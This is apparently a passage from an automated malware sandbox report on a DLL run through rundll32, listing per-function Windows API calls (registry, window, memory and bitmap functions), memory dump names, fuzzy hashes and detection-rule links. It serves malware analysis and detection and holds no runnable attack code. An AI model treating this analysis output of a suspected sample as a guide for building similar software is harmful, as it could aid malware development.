                                                                                                          • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 1002B313
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3338174999-0
                                                                                                          • Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
                                                                                                          • Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002AAF8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB77
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreate$Open
                                                                                                          • String ID: software
                                                                                                          • API String ID: 1740278721-2010147023
                                                                                                          • Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
                                                                                                          • Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B00C, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002B013
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1002B01D
                                                                                                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                                                                                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                                                                                                            • Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39
                                                                                                          • _memset.LIBCMT ref: 1002B060
                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 356813703-0
                                                                                                          • Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
                                                                                                          • Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A948, Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000F), ref: 1002A956
                                                                                                          • GetSysColor.USER32(00000010), ref: 1002A95D
                                                                                                          • GetSysColor.USER32(00000014), ref: 1002A964
                                                                                                          • GetSysColor.USER32(00000012), ref: 1002A96B
                                                                                                          • GetSysColor.USER32(00000006), ref: 1002A972
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 1002A97F
                                                                                                          • GetSysColorBrush.USER32(00000006), ref: 1002A986
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Brush
                                                                                                          • String ID:
                                                                                                          • API String ID: 2798902688-0
                                                                                                          • Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
                                                                                                          • Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002326D
                                                                                                          • GlobalLock.KERNEL32 ref: 10023345
                                                                                                          • CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
                                                                                                          • DestroyWindow.USER32(00000000,?,1000150C,00000000,4463D444), ref: 100233EE
                                                                                                          • GlobalUnlock.KERNEL32(?,?,1000150C,00000000,4463D444), ref: 100233FE
                                                                                                          • GlobalFree.KERNEL32 ref: 10023407
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3003189058-0
                                                                                                          • Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
                                                                                                          • Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10021E9F, Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowLongA.USER32 ref: 10021ED2
                                                                                                          • GetParent.USER32(00000000), ref: 10021EE0
                                                                                                          • GetParent.USER32(00000000), ref: 10021EF3
                                                                                                          • GetLastActivePopup.USER32(00000000), ref: 10021F04
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 10021F18
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 10021F2B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                          • String ID:
                                                                                                          • API String ID: 670545878-0
                                                                                                          • Opcode ID: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
                                                                                                          • Instruction ID: f929a2de190b898985c8684475384bdcb1a7d6cc0d17529594567964d95cf4f5
                                                                                                          • Opcode Fuzzy Hash: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
                                                                                                          • Instruction Fuzzy Hash: 7711E73B5012725BDBA2DA65AD80BDF32D8EFB5AE1F830165EC24E7204D730CD0142D5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CreateFrameInfo.LIBCMT ref: 10037760
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C
                                                                                                          • __getptd.LIBCMT ref: 1003776A
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 10037778
                                                                                                          • __getptd.LIBCMT ref: 10037786
                                                                                                          • __getptd.LIBCMT ref: 10037791
                                                                                                          • _CallCatchBlock2.LIBCMT ref: 100377B7
                                                                                                            • Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1602911419-0
                                                                                                          • Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
                                                                                                          • Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A8D2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1315500227-0
                                                                                                          • Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
                                                                                                          • Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10029F40, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset
                                                                                                          • String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
                                                                                                          • API String ID: 2102423945-455206835
                                                                                                          • Opcode ID: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
                                                                                                          • Instruction ID: fa70bd333b2ddaae6f39455d5bc8e436e1dc58d3be4ecb045c2565641b92f197
                                                                                                          • Opcode Fuzzy Hash: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
                                                                                                          • Instruction Fuzzy Hash: BD914175C00219ABDB80CFA4D581BDEBBF9EF48384F518065F908E7181EB749B84DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10020982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenuCheckMarkDimensions.USER32 ref: 1002099A
                                                                                                          • _memset.LIBCMT ref: 10020A12
                                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
                                                                                                          • LoadBitmapA.USER32 ref: 10020A8D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271682439-3916222277
                                                                                                          • Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
                                                                                                          • Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
                                                                                                          • GetSystemMetrics.USER32 ref: 10025168
                                                                                                          • GetSystemMetrics.USER32 ref: 1002516F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$Metrics$InfoParameters
                                                                                                          • String ID: B$DISPLAY
                                                                                                          • API String ID: 3136151823-3316187204
                                                                                                          • Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
                                                                                                          • Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10022E4B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Edit
                                                                                                          • API String ID: 0-554135844
                                                                                                          • Opcode ID: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
                                                                                                          • Instruction ID: d6f5fafa54f95e57ce7326ac47ec6df47115e019fe7e1f47642f1b857b3d0bbf
                                                                                                          • Opcode Fuzzy Hash: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
                                                                                                          • Instruction Fuzzy Hash: 4611A131200205BBEE20DAA1AC05F5EB6ECFF46791F930929F956D64B1CF61DC80E564
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 1003748E
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003749F
                                                                                                          • __getptd.LIBCMT ref: 100374AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: MOC$csm
                                                                                                          • API String ID: 803148776-1389381023
                                                                                                          • Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
                                                                                                          • Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
                                                                                                          • _memset.LIBCMT ref: 1002A78B
                                                                                                          • GetWindowTextA.USER32 ref: 1002A7A5
                                                                                                          • lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
                                                                                                          • SetWindowTextA.USER32(?,?), ref: 1002A7C3
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
